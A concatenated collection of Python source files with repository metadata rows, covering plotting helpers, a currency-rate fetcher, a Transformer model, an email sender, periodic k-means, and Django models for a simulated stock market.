PlotTextBox(ax,text,fontsize=10)
return True
def format_plot_general(**kwargs):
return format_plot(**kwargs)
def format_plot(ax=None,xlabel=None,ylabel=None,fontsize=20,use_loglog=False,xlim=None,ylim=None,use_bigticks=True,**kwargs):
'''format plot formats the matplotlib axis instance, ax,
performing routine formatting to the plot,
labeling the x axis by the string, xlabel and
labeling the y axis by the string, ylabel
'''
if not ax:
ax=plt.gca()
if use_loglog:
ax.set_xscale('log')
ax.set_yscale('log')
if xlabel:
ax.set_xlabel(xlabel,fontsize=fontsize,**kwargs)
if ylabel:
ax.set_ylabel(ylabel,fontsize=fontsize,**kwargs)
if use_bigticks:
ax.tick_params(axis='both', which='major', labelsize=fontsize,**kwargs)
ax.tick_params(axis='both', which='minor', labelsize=0,**kwargs)
if xlim:
ax.set_xlim(xlim)
if ylim:
ax.set_xlim(ylim)
return True
def FormatAxes(ax,x1label,x2label,title=None,x1lim=None,x2lim=None,fontsize=16,use_loglog=False,**kwargs):
if x1lim is not None:
ax.set_xlim(x1lim)
if x2lim is not None:
ax.set_ylim(x2lim)
if title is not None:
ax.set_title(title,fontsize=fontsize)
format_plot(ax, x1label, x2label, fontsize=fontsize, use_loglog=use_loglog,**kwargs)
return True
def plot_horizontal(ax,xlim,x0,Delta_thresh=1.,use_Delta_thresh=False):
#plot the solid y=0 line
x=np.linspace(xlim[0],xlim[1],10)
ax.plot(x,0*x+x0,'k-')
if use_Delta_thresh:
#plot the dotted +-Delta_thresh lines
ax.plot(x,0*x+Delta_thresh+x0,'k--',alpha=0.7)
ax.plot(x,0*x-Delta_thresh+x0,'k--',alpha=0.7)
return True
| 38.106061 | 137 | 0.690258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 506 | 0.201193 |
9eaab24d3548bb05725fadfb2ac9add9355eace8 | 331 | py | Python | box/endpoints.py | manojiitkumar93/apibox | 5e7c30da73be2179eb695148e4fe9909ac280e9e | [
"MIT"
]
| null | null | null | box/endpoints.py | manojiitkumar93/apibox | 5e7c30da73be2179eb695148e4fe9909ac280e9e | [
"MIT"
]
| null | null | null | box/endpoints.py | manojiitkumar93/apibox | 5e7c30da73be2179eb695148e4fe9909ac280e9e | [
"MIT"
]
| null | null | null | from lambdatest import Operations
from unicode1 import convert
file_name = "ocr.json"
k = Operations()
jsonObj = k.load_Json(file_name)
dictData = convert(jsonObj)
endpoints_list = dictData["endpoints"]
enp_path = []
dfp = {}
for i in endpoints_list:
enp_path.append(i["path"])
try:
dfp[i["path"]]=i['result']
except: pass
| 19.470588 | 38 | 0.722054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.123867 |
9eab6ea7aa5627d7aec1c6ead82d9bb0ee0138e3 | 4,804 | py | Python | src/currency_rates.py | akinmetin/currency-rates | 586ea1205eb4a00b84bb37f85e781060383a673a | [
"MIT"
]
| null | null | null | src/currency_rates.py | akinmetin/currency-rates | 586ea1205eb4a00b84bb37f85e781060383a673a | [
"MIT"
]
| 2 | 2020-03-05T19:55:07.000Z | 2020-10-25T13:30:18.000Z | src/currency_rates.py | akinmetin/currency-rates | 586ea1205eb4a00b84bb37f85e781060383a673a | [
"MIT"
]
| 2 | 2020-03-07T08:58:09.000Z | 2020-03-07T09:01:11.000Z | import requests
from decouple import config
import datetime
from calendar import monthrange
import psycopg2
import time
def create_db_table():
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
cur.execute('''CREATE TABLE rates
(DATE VARCHAR(10) NOT NULL,
CURRENCY VARCHAR(3) NOT NULL,
VALUE FLOAT NOT NULL);''')
con.commit()
con.close()
def first_run():
# first create a table in the database
create_db_table()
currentDT = datetime.datetime.now()
year = currentDT.year
month = currentDT.month
# find the previous month's number. If current month is the first month,
# then go to December of the previous year.
if year != 1:
month -= 1
else:
month = 12
year -= 1
# get total number of days in target month.
total_days = monthrange(year, month)[1]
# create database connection
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
# get entire month's data.
# http://data.fixer.io/api/YYYY-MM-DD?access_key=.....
for x in range(1, total_days + 1):
date = "{}/{}/{}".format(x, month, year)
url = "http://data.fixer.io/api/%s-%s-%s?access_key=%s" % \
(year, str(month).zfill(2), str(x).zfill(2), str(config("API_KEY")))
print(url)
response = requests.get(url)
data = response.json()["rates"]
for attr in data.keys():
cur.execute("INSERT INTO rates (DATE,CURRENCY,VALUE) \
VALUES (%s, %s, %s)", (date, str(attr), data[attr]))
# commit the waiting insert queries and close the connection.
con.commit()
con.close()
insert_into_db()
def check_db_table_exits():
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
cur.execute("select * from information_schema.tables where table_name=%s", ('rates',))
if bool(cur.rowcount):
con.close()
else:
con.close()
first_run()
def insert_into_db():
# get current date
currentDT = datetime.datetime.now()
year = currentDT.year
month = currentDT.month
day = currentDT.day
date = "{}/{}/{}".format(day, month, year)
# create database connection
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
# get currency json data from the api server
response = requests.get(config("API_ENDPOINT"))
data = response.json()["rates"]
for item in data.keys():
cur.execute("INSERT INTO rates (DATE,CURRENCY,VALUE) \
VALUES (%s, %s, %s)", (date, item, data[item]))
# commit the waiting insert queries and close the connection.
con.commit()
con.close()
def get_remaining_time():
currentDT = datetime.datetime.now()
hours = currentDT.hour
minutes = currentDT.minute
seconds = currentDT.second
# start to calculate remaining sleeping time in seconds
remain = (24 - hours)*3600 + (60 - minutes)*60 + seconds
return remain
if __name__ == "__main__":
# check db table, if doesn't exists then create tables and pull last month's data into the db.
check_db_table_exits()
# endless loop, sleep until next morning 9 am. and run again
while True:
remain = get_remaining_time()
print("Sleeping: " + str(remain))
time.sleep(remain)
# run daily api request and insert fresh data into db.
insert_into_db()
# https://fixer.io/quickstart
# https://fixer.io/documentation
# https://www.dataquest.io/blog/python-api-tutorial/
# python get time --> https://tecadmin.net/get-current-date-time-python/
# python postgresql --> https://stackabuse.com/working-with-postgresql-in-python/
# check table if exists --> https://stackoverflow.com/questions/1874113/checking-if-a-postgresql-table-exists-under-python-and-probably-psycopg2
# postgres data types (postgres float) --> https://www.postgresqltutorial.com/postgresql-data-types/
# python get number of days in month --> https://stackoverflow.com/questions/4938429/how-do-we-determine-the-number-of-days-for-a-given-month-in-python | 34.561151 | 151 | 0.622606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,164 | 0.450458 |
9eac32aaf34bddbfe912ad8b935101d15d22cb63 | 3,446 | py | Python | association_rules_viz/graph.py | ScenesK/association-rules-viz | 2134b0866509ae9b65f323da7972033e54ffb25f | [
"MIT"
]
| 1 | 2020-06-22T09:50:26.000Z | 2020-06-22T09:50:26.000Z | association_rules_viz/graph.py | ScenesK/association-rules-viz | 2134b0866509ae9b65f323da7972033e54ffb25f | [
"MIT"
]
| null | null | null | association_rules_viz/graph.py | ScenesK/association-rules-viz | 2134b0866509ae9b65f323da7972033e54ffb25f | [
"MIT"
]
| null | null | null | import numpy as np
import pandas as pd
import networkx as nx
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
def graph(lhs,
rhs,
support,
confidence,
lift,
data=None,
fig_scale=2,
font_size=None,
cmap=None):
if data is None:
data = pd.DataFrame(
dict(
lhs=lhs,
rhs=rhs,
support=support,
confidence=confidence,
lift=lift))
lhs = 'lhs'
rhs = 'rhs'
support = 'support'
confidence = 'confidence'
lift = 'lift'
centers = data[lhs].unique()
graphs = centers.size
rows = np.ceil(np.sqrt(graphs)).astype(int)
cols = np.ceil(graphs / rows).astype(int)
g = nx.DiGraph()
fig, axes = plt.subplots(
rows, cols, figsize=(cols * fig_scale, rows * fig_scale))
data.loc[:, support] = data[support] / data[support].max() * 500
pc = None
for i, ((row, col), ax) in enumerate(np.ndenumerate(axes)):
ax.axis('off')
if col == cols - 1:
divider = make_axes_locatable(ax)
width = 0.25
cax = divider.append_axes("right", size=width, pad=0.25)
cbar = fig.colorbar(pc, cax=cax)
cbar.set_label('lift', size=font_size)
cbar.ax.tick_params(labelsize=font_size)
if i >= graphs:
continue
center = centers[i]
g = nx.DiGraph()
g.add_node(center, label=', '.join(center), size=0, color=0)
for node in data.loc[data[lhs] == center, rhs]:
name = (center, node)
index = data.index[(data[lhs] == center) & (data[rhs] == node)]
g.add_node(
name,
label=', '.join(node),
size=data.loc[index, support].values[0],
color=data.loc[index, lift])
g.add_edge(
center, name, weight=data.loc[index, confidence].values[0])
pos = nx.spring_layout(g)
pos[center] = np.zeros(2)
nodelist = g.nodes
sizes = nx.get_node_attributes(g, 'size')
node_size = [sizes[key] for key in nodelist]
colors = nx.get_node_attributes(g, 'color')
node_color = [colors[key] for key in nodelist]
vmax = np.abs(data[lift]).max()
vmin = -vmax
pc = nx.draw_networkx_nodes(
g,
pos,
node_size=node_size,
node_color=node_color,
cmap=cmap,
vmin=vmin,
vmax=vmax,
ax=ax)
labels = nx.get_node_attributes(g, 'label')
nx.draw_networkx_labels(g, pos, labels, font_size=font_size, ax=ax)
edgelist = g.edges
weights = nx.get_edge_attributes(g, 'weight')
edge_width = np.array([weights[key] for key in edgelist
]) / data[confidence].max() * 3
nx.draw_networkx_edges(g, pos, width=edge_width, alpha=0.5, ax=ax)
xlim = ax.get_xlim()
ylim = ax.get_ylim()
ax.set(
xlim=[-np.abs(xlim).max(), np.abs(xlim).max()],
ylim=[-np.abs(ylim).max(), np.abs(ylim).max()])
pc.set(clip_on=False)
for child in ax.get_children():
if isinstance(child, mpl.text.Text):
child.set(clip_on=False)
plt.show()
| 34.46 | 75 | 0.531631 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 91 | 0.026407 |
9ead611c9befd61012037395d04c055fa2feabec | 1,833 | py | Python | src/herald/herald.py | Artic42/ArticUtils | 4eb3d010e2448d12edde569b600e6cd0d8f1d7a5 | [
"MIT"
]
| null | null | null | src/herald/herald.py | Artic42/ArticUtils | 4eb3d010e2448d12edde569b600e6cd0d8f1d7a5 | [
"MIT"
]
| null | null | null | src/herald/herald.py | Artic42/ArticUtils | 4eb3d010e2448d12edde569b600e6cd0d8f1d7a5 | [
"MIT"
]
| null | null | null | import readExcel
import modifyFile
import sys
import time
import sendEmail
def main (excelFilePath):
emailConfigPath = "/tmp/emailConfig"
emailFilePath = "/tmp/emails"
sys.system ("mkdir -p" + emailConfigPath)
sys.system ("mkdir -p" + emailFilePath)
#Read excel file
excel = readExcel.readExcelFile (excelFilePath)
#Get config values
server = readExcel.getValueCell(excel, 1, 2)
sender = readExcel.getValueCell(excel, 2, 2)
subject = readExcel.getValueCell(excel, 3, 2)
user = readExcel.getValueCell(excel, 4, 2)
passwd = input ("Give email password?")
sendEmail.createEmailConfig (emailConfigPath, server, user, passwd)
#Create a list of all variables to change in body
titleRow = readExcel.getRowValues(excel,6,6) [0] [2:]
#Create list of data for every email
recipients = readExcel.getRowValues (excel,7, None)
#For all items in list
#Make the changes to the body, and create .email
paths = []
for recipient in recipients:
bodyPath = "/tmp/body"
modifyFile.copyFile ('body.html', bodyPath)
variables = recipient[2:]
for i in range(len(variables)):
modifyFile.replaceString (bodyPath, titleRow[i], str(variables[i]))
#Create .email file
tmpPath = emailFilePath + "/" + recipient[1] + ".email"
sendEmail.createEmailFile (tmpPath, bodyPath, subject, sender, recipient[0])
#Put path on list
paths.append (tmpPath)
#For item in path send email and wait 6 seconds
for path in paths:
sendEmail.send (path, emailConfigPath)
print ("Email send!")
time.sleep (6)
return
if __name__ == "__main__":
if len (sys.argv) < 2:
main ("HeraldConfig.xlsx")
else:
main (sys.argv [1]) | 29.095238 | 84 | 0.643208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 420 | 0.229133 |
9eaf5189699bfaacfc0f73117848a3fc060f8088 | 2,314 | py | Python | cvpack/extras/clustering.py | alkasm/cvtools | 7d7aceddf18aca03ac77ccf8e0da7f71ef6674a3 | [
"MIT"
]
| 10 | 2018-09-22T14:05:42.000Z | 2020-11-30T07:12:18.000Z | cvpack/extras/clustering.py | alkasm/cvmod | 7d7aceddf18aca03ac77ccf8e0da7f71ef6674a3 | [
"MIT"
]
| 3 | 2019-02-22T20:54:53.000Z | 2021-04-15T17:56:44.000Z | cvpack/extras/clustering.py | alkasm/cvpack | 7d7aceddf18aca03ac77ccf8e0da7f71ef6674a3 | [
"MIT"
]
| 1 | 2019-04-01T18:35:46.000Z | 2019-04-01T18:35:46.000Z | # type: ignore
import cv2
import numpy as np
TWO_PI = 2 * np.pi
def kmeans_periodic(columns, intervals, data, *args, **kwargs):
"""Runs kmeans with periodicity in a subset of dimensions.
Transforms columns with periodicity on the specified intervals into two
columns with coordinates on the unit circle for kmeans. After running
through kmeans, the centers are transformed back to the range specified
by the intervals.
Arguments
---------
columns : sequence
Sequence of indexes specifying the columns that have periodic data
intervals : sequence of length-2 sequences
Sequence of (min, max) intervals, one interval per column
See help(cv2.kmeans) for all other arguments, which are passed through.
Returns
-------
See help(cv2.kmeans) for outputs, which are passed through; except centers,
which is modified so that it returns centers corresponding to the input
data, instead of the transformed data.
Raises
------
cv2.error
If len(columns) != len(intervals)
"""
# Check each periodic column has an associated interval
if len(columns) != len(intervals):
raise cv2.error("number of intervals must be equal to number of columns")
ndims = data.shape[1]
ys = []
# transform each periodic column into two columns with the x and y coordinate
# of the angles for kmeans; x coord at original column, ys are appended
for col, interval in zip(columns, intervals):
a, b = min(interval), max(interval)
width = b - a
data[:, col] = TWO_PI * (data[:, col] - a) / width % TWO_PI
ys.append(width * np.sin(data[:, col]))
data[:, col] = width * np.cos(data[:, col])
# append the ys to the end
ys = np.array(ys).transpose()
data = np.hstack((data, ys)).astype(np.float32)
# run kmeans
retval, bestLabels, centers = cv2.kmeans(data, *args, **kwargs)
# transform the centers back to range they came from
for i, (col, interval) in enumerate(zip(columns, intervals)):
a, b = min(interval), max(interval)
angles = np.arctan2(centers[:, ndims + i], centers[:, col]) % TWO_PI
centers[:, col] = a + (b - a) * angles / TWO_PI
centers = centers[:, :ndims]
return retval, bestLabels, centers
| 33.536232 | 81 | 0.653414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,297 | 0.560501 |
9eb1d479f5b09c6f55397ec22af703577ef9ccc9 | 6,599 | py | Python | models/model.py | SeungoneKim/Transformer_implementation | a52bf552eb645fc9bfb812cc26842fc147d6c008 | [
"Apache-2.0"
]
| null | null | null | models/model.py | SeungoneKim/Transformer_implementation | a52bf552eb645fc9bfb812cc26842fc147d6c008 | [
"Apache-2.0"
]
| null | null | null | models/model.py | SeungoneKim/Transformer_implementation | a52bf552eb645fc9bfb812cc26842fc147d6c008 | [
"Apache-2.0"
]
| null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from models.embedding import TokenEmbedding, PositionalEncoding, TransformerEmbedding
from models.attention import ScaledDotProductAttention, MultiHeadAttention, FeedForward
from models.layers import EncoderLayer, DecoderLayer
class Encoder(nn.Module):
def __init__(self, enc_vocab_size, src_max_len,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, drop_prob, device):
super(Encoder,self).__init__()
self.embedding = TransformerEmbedding(enc_vocab_size, model_dim, src_max_len, drop_prob, device)
self.layers = nn.ModuleList([EncoderLayer(model_dim, key_dim, value_dim,
hidden_dim, num_head,
drop_prob) for _ in range(num_layer)])
def forward(self, tensor, src_mask):
input_emb = self.embedding(tensor)
encoder_output = input_emb
for layer in self.layers:
encoder_output = layer(encoder_output, src_mask)
return encoder_output
class Decoder(nn.Module):
def __init__(self, dec_vocab_size, tgt_max_len,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, drop_prob, device):
super(Decoder,self).__init__()
self.embedding = TransformerEmbedding(dec_vocab_size, model_dim, tgt_max_len, drop_prob, device)
self.layers = nn.ModuleList([DecoderLayer(model_dim, key_dim, value_dim,
hidden_dim, num_head,
drop_prob) for _ in range(num_layer)])
def forward(self, tensor, encoder_output, src_mask, tgt_mask):
tgt_emb = self.embedding(tensor)
decoder_output = tgt_emb
for layer in self.layers:
decoder_output = layer(decoder_output, encoder_output, src_mask, tgt_mask)
return decoder_output
class LangaugeModelingHead(nn.Module):
def __init__(self, model_dim, dec_vocab_size):
super(LangaugeModelingHead,self).__init__()
self.linearlayer = nn.Linear(model_dim, dec_vocab_size)
def forward(self, decoder_output):
return self.linearlayer(decoder_output)
class TransformersModel(nn.Module):
def __init__(self, src_pad_idx, tgt_pad_idx,
enc_vocab_size, dec_vocab_size,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, enc_max_len, dec_max_len, drop_prob, device):
super(TransformersModel, self).__init__()
self.src_pad_idx = src_pad_idx
self.tgt_pad_idx = tgt_pad_idx
self.device = device
self.Encoder = Encoder(enc_vocab_size, enc_max_len,
model_dim, key_dim, value_dim, hidden_dim, num_head, num_layer, drop_prob, device)
self.Decoder = Decoder(dec_vocab_size, dec_max_len,
model_dim, key_dim, value_dim, hidden_dim, num_head, num_layer, drop_prob, device)
self.LMHead = LangaugeModelingHead(model_dim, dec_vocab_size)
def forward(self, src_tensor, tgt_tensor):
enc_mask = self.generate_padding_mask(src_tensor, src_tensor, "src","src")
enc_dec_mask = self.generate_padding_mask(tgt_tensor, src_tensor, "src","tgt")
dec_mask = self.generate_padding_mask(tgt_tensor, tgt_tensor,"tgt","tgt") * \
self.generate_triangular_mask(tgt_tensor, tgt_tensor)
encoder_output = self.Encoder(src_tensor, enc_mask)
decoder_output = self.Decoder(tgt_tensor, encoder_output, enc_dec_mask, dec_mask)
output = self.LMHead(decoder_output)
return output
# applying mask(opt) : 0s are where we apply masking
# pad_type =["src". "tgt"]
def generate_padding_mask(self, query, key, query_pad_type=None, key_pad_type=None):
# query = (batch_size, query_length)
# key = (batch_size, key_length)
query_length = query.size(1)
key_length = key.size(1)
# decide query_pad_idx based on query_pad_type
if query_pad_type == "src":
query_pad_idx = self.src_pad_idx
elif query_pad_type == "tgt":
query_pad_idx = self.tgt_pad_idx
else:
assert "query_pad_type should be either src or tgt"
# decide key_pad_idx based on key_pad_type
if key_pad_type == "src":
key_pad_idx = self.src_pad_idx
elif key_pad_type == "tgt":
key_pad_idx = self.tgt_pad_idx
else:
assert "key_pad_type should be either src or tgt"
# convert query and key into 4-dimensional tensor
# query = (batch_size, 1, query_length, 1) -> (batch_size, 1, query_length, key_length)
query = query.ne(query_pad_idx).unsqueeze(1).unsqueeze(3)
query = query.repeat(1,1,1,key_length)
# key = (batch_size, 1, 1, key_length) -> (batch_size, 1, query_length, key_length)
key = key.ne(key_pad_idx).unsqueeze(1).unsqueeze(2)
key = key.repeat(1,1,query_length,1)
# create padding mask with key and query
mask = key & query
return mask
# applying mask(opt) : 0s are where we apply masking
def generate_triangular_mask(self, query, key):
# query = (batch_size, query_length)
# key = (batch_size, key_length)
query_length = query.size(1)
key_length = key.size(1)
# create triangular mask
mask = torch.tril(torch.ones(query_length,key_length)).type(torch.BoolTensor).to(self.device)
return mask
def build_model(src_pad_idx, tgt_pad_idx,
enc_vocab_size, dec_vocab_size,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, enc_max_len, dec_max_len, drop_prob):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model = TransformersModel(src_pad_idx, tgt_pad_idx,
enc_vocab_size, dec_vocab_size,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, enc_max_len, dec_max_len, drop_prob,device)
return model.cuda() if torch.cuda.is_available() else model | 43.993333 | 105 | 0.618882 | 5,648 | 0.855887 | 0 | 0 | 0 | 0 | 0 | 0 | 800 | 0.12123 |
9eb2558837d9b3df4ed680f126f72ec0f1a601b9 | 23,299 | py | Python | market/models/sim_trades.py | LuoMaimingS/django_virtual_stock_market | cfeccdbb906f9998ec0a0633c2d2f39cdd87bf85 | [
"BSD-3-Clause"
]
| 1 | 2021-05-29T23:33:41.000Z | 2021-05-29T23:33:41.000Z | market/models/sim_trades.py | LuoMaimingS/django_virtual_stock_market | cfeccdbb906f9998ec0a0633c2d2f39cdd87bf85 | [
"BSD-3-Clause"
]
| null | null | null | market/models/sim_trades.py | LuoMaimingS/django_virtual_stock_market | cfeccdbb906f9998ec0a0633c2d2f39cdd87bf85 | [
"BSD-3-Clause"
]
| null | null | null | # _*_ coding:UTF-8 _*_
"""
该文件定义了模拟环境中交易动作相关的模型
并非虚拟股市原本的模型,做了一些适应性的调整,取消了全部外键。
"""
from django.db import models
import uuid
from decimal import Decimal
import time
from .clients import BaseClient
from .sim_market import SimMarket
from .sim_clients import SimHoldingElem, SimCommissionElem, SimTransactionElem
from .sim_stocks import SimStock, SimOrderBookEntry, SimOrderBookElem
from .config import *
class SimTradeMsg(models.Model):
stock_symbol = models.CharField(max_length=12)
initiator = models.IntegerField(verbose_name='交易的发起方ID')
trade_direction = models.CharField(max_length=1)
trade_price = models.DecimalField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES)
trade_vol = models.IntegerField()
trade_date = models.DateTimeField(blank=False)
trade_tick = models.IntegerField(blank=False)
# 被交易的挂单的ID
commission_id = models.UUIDField(blank=False, default=uuid.uuid4, verbose_name='原本挂单的uuid')
acceptor = models.IntegerField(verbose_name='交易的接受方ID')
tax_charged = models.FloatField(default=0)
def sim_instant_trade(msg):
"""
client的委托立刻得到了交易,从而不会出现在委托记录中
:param msg: 交易的相关信息,是一个TradeMsg类
"""
initiator = msg.initiator
stock_symbol = msg.stock_symbol
initiator_object = BaseClient.objects.get(id=initiator)
stock_object = SimStock.objects.get(symbol=stock_symbol)
SimTransactionElem.objects.create(one_side=initiator, the_other_side=msg.acceptor,
stock_symbol=stock_symbol, price_traded=msg.trade_price, vol_traded=msg.trade_vol,
date_traded=msg.trade_date, operation=msg.trade_direction)
if msg.trade_direction == 'a':
# 卖出
hold_element = SimHoldingElem.objects.get(owner=initiator, stock_symbol=stock_symbol)
available_shares = hold_element.available_vol
assert available_shares >= msg.trade_vol
hold_element.available_vol -= msg.trade_vol
hold_element.vol -= msg.trade_vol
if hold_element.vol == 0:
# 目前为止已全部卖出,不再持有,删除该条数据
hold_element.delete()
else:
hold_element.save(update_fields=['vol', 'available_vol'])
earning = float(msg.trade_price * msg.trade_vol - msg.tax_charged)
initiator_object.cash += earning
initiator_object.flexible_cash += earning
elif msg.trade_direction == 'b':
# 买入
holding = SimHoldingElem.objects.filter(owner=initiator, stock_symbol=stock_symbol)
if holding.exists():
# 之前本就持有该股票
assert holding.count() == 1
new_holding = holding[0]
new_holding.cost = Decimal((new_holding.cost * new_holding.vol + msg.trade_price * msg.trade_vol) /
(new_holding.vol + msg.trade_vol))
new_holding.price_guaranteed = new_holding.cost
new_holding.last_price = stock_object.last_price
new_holding.vol += msg.trade_vol
new_holding.available_vol += msg.trade_vol
new_holding.profit -= msg.tax_charged
new_holding.value = float(stock_object.last_price) * new_holding.vol
new_holding.save()
else:
# 即买入新的股票
SimHoldingElem.objects.create(owner=initiator, stock_symbol=stock_symbol,
vol=msg.trade_vol, frozen_vol=0, available_vol=msg.trade_vol,
cost=msg.trade_price, price_guaranteed=msg.trade_price,
last_price=stock_object.last_price, profit=- msg.tax_charged,
value=stock_object.last_price * msg.trade_vol, date_bought=msg.trade_date)
spending = float(msg.trade_price * msg.trade_vol + msg.tax_charged)
initiator_object.cash -= spending
initiator_object.flexible_cash -= spending
initiator_object.save(update_fields=['cash', 'flexible_cash'])
return True
def sim_delayed_trade(msg):
"""
client的委托记录中的委托得到了交易,从而改变委托情况
:param msg: 交易的相关信息,是一个TradeMsg类
"""
assert isinstance(msg, SimTradeMsg)
acceptor = msg.acceptor
stock_symbol = msg.stock_symbol
if msg.trade_direction == 'a':
acceptor_direction = 'b'
else:
acceptor_direction = 'a'
acceptor_object = BaseClient.objects.get(id=acceptor)
stock_object = SimStock.objects.get(symbol=stock_symbol)
# 先处理委托
commission_element = SimCommissionElem.objects.get(unique_id=msg.commission_id)
assert commission_element.stock_symbol == stock_symbol
assert commission_element.operation == acceptor_direction
assert commission_element.vol_traded + msg.trade_vol <= commission_element.vol_committed
new_avg_price = (commission_element.price_traded * commission_element.vol_traded +
msg.trade_price * msg.trade_vol) / (commission_element.vol_traded + msg.trade_vol)
commission_element.price_traded = new_avg_price
commission_element.vol_traded += msg.trade_vol
# 委托完成时的操作,目前直接删除,没有委托历史记录,只有历史成交记录
if commission_element.vol_traded == commission_element.vol_committed:
commission_element.delete()
else:
commission_element.save(update_fields=['price_traded', 'vol_traded'])
if acceptor_direction == 'a':
# 卖出,处理持仓
hold_element = SimHoldingElem.objects.get(owner=acceptor, stock_symbol=stock_symbol)
frozen_shares = hold_element.frozen_vol
assert frozen_shares >= msg.trade_vol
hold_element.frozen_vol -= msg.trade_vol
hold_element.vol -= msg.trade_vol
if hold_element.vol == 0:
# 该持有的股票目前为止已全部卖出,不再持有,删除该条数据
hold_element.delete()
else:
hold_element.save(update_fields=['vol', 'frozen_vol'])
# 结算收益,成交金额减去收益
earning = float(msg.trade_price * msg.trade_vol - msg.tax_charged)
acceptor_object.cash += earning
acceptor_object.flexible_cash += earning
elif acceptor_direction == 'b':
# 买入,建仓
holding = SimHoldingElem.objects.filter(owner=acceptor, stock_symbol=stock_symbol)
if holding.exists():
# 之前本就持有该股票
assert holding.count() == 1
new_holding = holding[0]
new_holding.cost = Decimal((new_holding.cost * new_holding.vol + msg.trade_price * msg.trade_vol) /
(new_holding.vol + msg.trade_vol))
new_holding.price_guaranteed = new_holding.cost
new_holding.last_price = stock_object.last_price
new_holding.vol += msg.trade_vol
new_holding.available_vol += msg.trade_vol
new_holding.profit -= msg.tax_charged
new_holding.value = float(stock_object.last_price) * new_holding.vol
new_holding.save()
else:
# 即买入新的股票
SimHoldingElem.objects.create(owner=acceptor, stock_symbol=stock_symbol,
vol=msg.trade_vol, frozen_vol=0, available_vol=msg.trade_vol,
cost=msg.trade_price, price_guaranteed=msg.trade_price,
last_price=stock_object.last_price, profit=- msg.tax_charged,
value=stock_object.last_price * msg.trade_vol, date_bought=msg.trade_date)
# 结算交易成本,扣除冻结资金和资金余额
spending = float(msg.trade_price * msg.trade_vol + msg.tax_charged)
acceptor_object.cash -= spending
acceptor_object.frozen_cash -= spending
acceptor_object.save(update_fields=['cash', 'frozen_cash', 'flexible_cash'])
return True
class SimCommissionMsg(models.Model):
stock_symbol = models.CharField(max_length=12)
commit_client = models.IntegerField(verbose_name='委托的client的ID')
commit_direction = models.CharField(max_length=1, default='b')
commit_price = models.DecimalField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES, default=0)
commit_vol = models.IntegerField(default=0)
commit_date = models.DateTimeField(blank=True, default=None)
# used for cancel a commission
commission_to_cancel = models.UUIDField(verbose_name='委托取消的目标委托本身的uuid', default=uuid.uuid4)
# Confirm the commission
confirmed = models.BooleanField(default=False)
def is_valid(self):
"""
判断委托信息是否合法
:return: 合法则返回True
"""
if not SimStock.objects.filter(symbol=self.stock_symbol).exists():
# 委托的股票标的不存在
print('The STOCK COMMITTED DOES NOT EXIST!')
return False
else:
stock_corr = SimStock.objects.get(symbol=self.stock_symbol)
if stock_corr.limit_up != 0 and stock_corr.limit_down != 0:
if self.commit_price > stock_corr.limit_up or self.commit_price < stock_corr.limit_down:
# 委托价格,需要在涨跌停价之间
print('COMMIT PRICE MUST BE BETWEEN THE LIMIT UP AND THE LIMIT DOWN!')
return False
if self.commit_direction not in ['a', 'b', 'c']:
# 委托方向,需要是买/卖/撤,三者其一
print('COMMIT DIRECTION INVALID!')
return False
commit_client_object = BaseClient.objects.get(id=self.commit_client)
if self.commit_direction == 'a':
# 委卖,则委托的股票必须有合理的持仓和充足的可用余额
if not SimHoldingElem.objects.filter(owner=self.commit_client, stock_symbol=self.stock_symbol).exists():
print('DOES NOT HOLD THE STOCK!')
return False
holding_element = SimHoldingElem.objects.get(owner=self.commit_client, stock_symbol=self.stock_symbol)
if holding_element.available_vol < self.commit_vol:
print('DOES NOT HOLD ENOUGH STOCK SHARES!')
return False
elif self.commit_direction == 'b':
# 委买,则必须有充足的可用余额,能够负担税费的冻结资金
if commit_client_object.flexible_cash < self.commit_price * self.commit_vol * Decimal(1 + TAX_RATE):
print('CAN NOT AFFORD THE FROZEN CASH!')
return False
elif self.commit_direction == 'c':
# 委托撤单,则必须有合理的委托,撤单即撤销该委托
if self.commission_to_cancel is None:
print('COMMISSION CANCELED IS NONE!')
return False
return True
def sim_add_commission(msg):
"""
client成功提交了一个委托,且部分或全部没有被交易,将更新client的委托信息和相应股票的order book
:param msg:委托的相关信息,是一个CommissionMsg类
"""
assert isinstance(msg, SimCommissionMsg)
assert msg.confirmed is True
principle = msg.commit_client
stock_symbol = msg.stock_symbol
market = SimMarket.objects.get(id=1)
order_book_entry, created = SimOrderBookEntry.objects.get_or_create(stock_symbol=stock_symbol,
entry_price=msg.commit_price,
entry_direction=msg.commit_direction)
order_book_entry.total_vol += msg.commit_vol
order_book_entry.save(update_fields=['total_vol'])
new_order_book_element = SimOrderBookElem.objects.create(entry_belonged=order_book_entry.id,
client=principle,
direction_committed=msg.commit_direction,
price_committed=msg.commit_price,
vol_committed=msg.commit_vol,
date_committed=market.datetime)
SimCommissionElem.objects.create(owner=principle, stock_symbol=stock_symbol, operation=msg.commit_direction,
price_committed=msg.commit_price, vol_committed=msg.commit_vol,
